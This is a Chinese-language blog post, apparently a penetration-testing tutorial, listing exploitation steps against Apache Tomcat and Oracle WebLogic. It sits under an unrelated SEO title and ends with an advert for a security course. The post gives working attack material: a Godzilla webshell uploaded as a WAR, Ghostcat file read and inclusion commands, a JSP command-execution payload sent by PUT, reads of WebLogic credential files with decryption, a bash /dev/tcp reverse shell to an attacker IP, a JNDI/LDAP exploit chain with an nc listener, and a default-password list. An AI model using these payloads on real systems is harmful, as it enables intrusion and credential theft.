考幼师证去哪个网站做试题网站开发费用报价表百度
2026/1/18 1:37:37 网站建设 项目流程
考幼师证去哪个网站做试题,网站开发费用报价表百度,网站在线服务,做网站做国外广告1、Tomcat#xff1a;猫咪虽可爱#xff0c;安全要牢记#xff01; 弱口令#xff1a;一不小心#xff0c;后门大开 影响版本#xff1a;所有版本都得注意#xff0c;安全无小事#xff01; 漏洞复现#xff1a;还在用弱口令#xff1f;黑客笑了#xff01;用哥斯…1、Tomcat猫咪虽可爱安全要牢记弱口令一不小心后门大开影响版本所有版本都得注意安全无小事漏洞复现还在用弱口令黑客笑了用哥斯拉或者你喜欢的任何木马生成器生成一个木马分分钟上传getshell。遇到弹窗点【取消】就对了别慌页面提示很明显了去 Tomcat 的 conf 目录下找到 tomcat-users.xml 文件。看这里红色框框里的代码红框1是你的密码如果你设置了的话没设置就像红框2一样空空如也。username 是账户password 是密码记住了吗接下来用你最爱的姿势哥斯拉生成木马。得到 ws.jsp 木马文件先压缩成 ws.zip再压缩成 ws.war上传访问一下看看是不是上传成功了。/ws 解压后是 ws.jsp所以访问 ws/ws.jsp。哥斯拉成功连上接下来就是你的表演时间了文件包含漏洞(CVE-2020-1938)Ghostcat 幽灵猫防不胜防漏洞描述Tomcat 默认开启的 AJP 连接器本意是方便和其他 Web 服务器交互结果却成了黑客的突破口。通过恶意 AJP 请求黑客可以读取甚至包含 Web 应用根目录下的任意文件。如果再配合文件上传漏洞上传个任意格式的文件就能直接 RCE (Remote Code Execution) 了记住只有开启 AJP 服务且对外暴露时才受此漏洞影响Tomcat 默认开启 AJP 并绑定到 0.0.0.0/0。影响范围Apache Tomcat 9.x 9.0.31 Apache Tomcat 8.x 8.5.51 Apache Tomcat 7.x 7.0.100 Apache Tomcat 6.x前提条件Tomcat 开启了 AJP Connector并且黑客能访问 AJP Connector 服务端口 (默认 8009)。漏洞原理Tomcat 有两个 ConnectorHTTP (默认 8080) 和 AJP (默认 8009)。AJP 比 HTTP 更优化常用于反向代理、集群等场景。这个漏洞就是因为 Tomcat AJP 协议的缺陷让黑客可以通过构造特定参数读取 Webapps 下的任意文件甚至包含任意文件。如果再配合文件上传点上传图片马就能 get shell 了漏洞危害黑客可以读取 Tomcat 所有 Webapp 目录下的任意文件包括配置文件、源代码等敏感信息。更可怕的是如果你的网站有文件上传功能黑客可以先上传一个包含恶意 JSP 脚本的文件可以是任意类型的文件比如图片然后利用 Ghostcat 漏洞包含这个文件直接执行代码漏洞复现1、下载有漏洞的 Tomcat 版本https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip2、安装 JDK配置环境变量不会的自行 Google。3、启动 Tomcat运行 Tomcat 目录 /bin 文件夹下的 startup.bat。任意文件读取读取 Webapps 目录下的任何文件比如 WEB-INF/web.xmlpython CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xml任意文件包含1、先上传一个包含恶意代码的文件到 Webapps 目录比如 test.txttest.txt% out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(whoami).getInputStream())).readLine()); %2、访问这个文件确保它能被访问到。3、执行命令python3 cve-2020-10487-v1.py 192.168.1.9 -p 8009 -f exec.txt --rce 1文件上传漏洞(CVE-2017-12615)PUT 方法惹的祸漏洞原理如果 Tomcat 运行在 Windows 上并且启用了 HTTP PUT 请求方法黑客就可以构造请求上传包含任意代码的 JSP 文件然后服务器就会执行这些代码影响范围Tomcat 7.0.0 - 7.0.81漏洞描述这个漏洞是因为 Tomcat 默认配置中readonly参数被设置为false。漏洞复现用 Vulhub 搭建靶场一键搞定可以看到readonly值为false。发送 PUT 请求PUT /1.jsp/ HTTP/1.1 Host: your-ip:8080 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5 % java.io.InputStream is Runtime.getRuntime() .exec(request.getParameter(command)) .getInputStream(); int a -1; byte[] b new byte[2048]; while ((a is.read(b)) ! -1) { out.print(new String(b)); } %访问上传的 JSP 文件执行任意命令2、Weblogic不只是个服务器还是个高危漏洞集散地任意文件读取漏洞想看啥就看啥就问你怕不怕漏洞原理通过 URL 就能读取服务器上的任意文件比如/hello/file.jsp?path/etc/passwd。影响范围Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3漏洞复现通过/etc/passwd读取用户信息http://xxx:7001/hello/file.jsp?path/etc/passwd1、读取密文文件先读取配置文件拿到加密密钥/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml2、读取加密后的密码用 Burp Suite 抓包把密码保存为 .dat 文件/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat把读取的文件内容保存成文件。3、解密用这个工具https://github.com/TideSec/Decrypt_Weblogic_Password远程命令执行漏洞(CVE-2020-14882/14883)不登录也能为所欲为漏洞原理CVE-2020-14883 允许未授权用户接管 WebLogic Server ConsoleCVE-2020-14882 允许在 Console 上执行任意代码。组合起来黑客可以通过一个 GET 请求在远程 WebLogic 服务器上以任意用户身份执行命令影响范围WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0漏洞复现构造 XML 文件?xml version1.0 encodingUTF-8 ? beans xmlnshttp://www.springframework.org/schema/beans xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd bean idpb classjava.lang.ProcessBuilder init-methodstart constructor-arg list valuebash/value value-c/value value![CDATA[touch /tmp/success]]/value /list /constructor-arg /bean /beans访问这个 XML 文件服务器会在 /tmp 目录下生成 success 文件。同理修改 XML 文件中的![CDATA[touch /tmp/success]]为![CDATA[bash -i /dev/tcp/攻击机IP/4444 01]]即可反弹 shell未授权远程代码执行漏洞(CVE-2023-21839)T3/IIOP 协议的噩梦漏洞原理WebLogic 的 IIOP/T3 协议存在缺陷允许未授权的攻击者通过 IIOP/T3 协议网络访问存在安全风险的 WebLogic Server。利用成功后黑客可以接管 WebLogic Server执行任意命令导致服务器沦陷或敏感数据泄露。影响范围12.2.1.2.0 12.2.1.1.0 12.2.1.3.0 12.2.1.0.0 12.2.1.4.0 14.1.1.0.0 12.1.2.0.0 12.1.3.0.0 10.3.6.0FOFA 指纹appBEA-WebLogic-Server || appWeblogic_interface_7001Vulfocus 已经集成了该漏洞环境docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release漏洞环境使用 Vulhub 搭建。漏洞复现下载 JNDIExploithttps://github.com/WhiteHSBG/JNDIExploit1、搭建 LDAP 服务java -jar JNDIExploit-1.2-SNAPSHOT.jar -i kali的ip2、Kali 开启 NC 监听nc -lvvp 99993、下载 EXPhttps://github.com/DXask88MA/Weblogic-CVE-2023-21839执行命令java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口4、成功反弹 shell监听成功Weblogic 常用弱口令赶紧去测测你的 Weblogic 是不是裸奔weblogic/Oracle123 system/password weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem weblogic/weblogic123 weblogic/weblogic2 system/password weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem guest/guest portaladmin/portaladmin system/system WebLogic/WebLogic ## 学习资源 如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你 知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。 #### 1、知识库价值 深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。 广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。 实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。 #### 2、 部分核心内容展示 360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/05423dde4c234794931dc82087f5cfb9.png#pic_center) 360智榜样学习中心独家《网络攻防知识库》采用**由浅入深、攻防结合**的讲述方式既夯实基础技能更深入高阶对抗技术。 内容组织紧密结合攻防场景辅以大量**真实环境复现案例、自动化工具脚本及配置解析**。通过**策略讲解、原理剖析、实战演示**相结合是你学习过程中好帮手。 **1、网络安全意识** ![img](https://i-blog.csdnimg.cn/img_convert/fa8c915f2e45a7b28b1ca657bff8e748.png) **2、Linux操作系统** ![img](https://i-blog.csdnimg.cn/img_convert/e95958fb0c3198ec99731b01beda0f18.png) **3、WEB架构基础与HTTP协议** ![img](https://i-blog.csdnimg.cn/img_convert/8ee2ef75a3d8f28938218a4bc63ee9a1.png) **4、Web渗透测试** ![img](https://i-blog.csdnimg.cn/img_convert/e64c8548227cf570bebcbed7d3a17028.png) **5、渗透测试案例分享** ![img](https://i-blog.csdnimg.cn/img_convert/950b97c5d1707fef125219f8c317e556.png) **6、渗透测试实战技巧** ![图片](https://i-blog.csdnimg.cn/img_convert/c10e42351697065bf12409917ce2fffa.png) **7、攻防对战实战** ![图片](https://i-blog.csdnimg.cn/img_convert/73d9f4bf46ce2d616e38a454c9bd2092.png) **8、CTF之MISC实战讲解** ![图片](https://i-blog.csdnimg.cn/img_convert/7436339f38ec5dcb69107505b93e5b99.png) ## 3、适合学习的人群 ‌**一、基础适配人群**‌ 1. ‌**零基础转型者**‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌ 2. ‌**开发/运维人员**‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业 3. ‌**应届毕业生**‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌ ‌**二、能力提升适配**‌ 1、‌**技术爱好者**‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌ 2、**安全从业者**‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌ 3、‌**合规需求者**‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌ 因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/2d7b7474227341e59069a6e903663246.jpeg#pic_center)

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询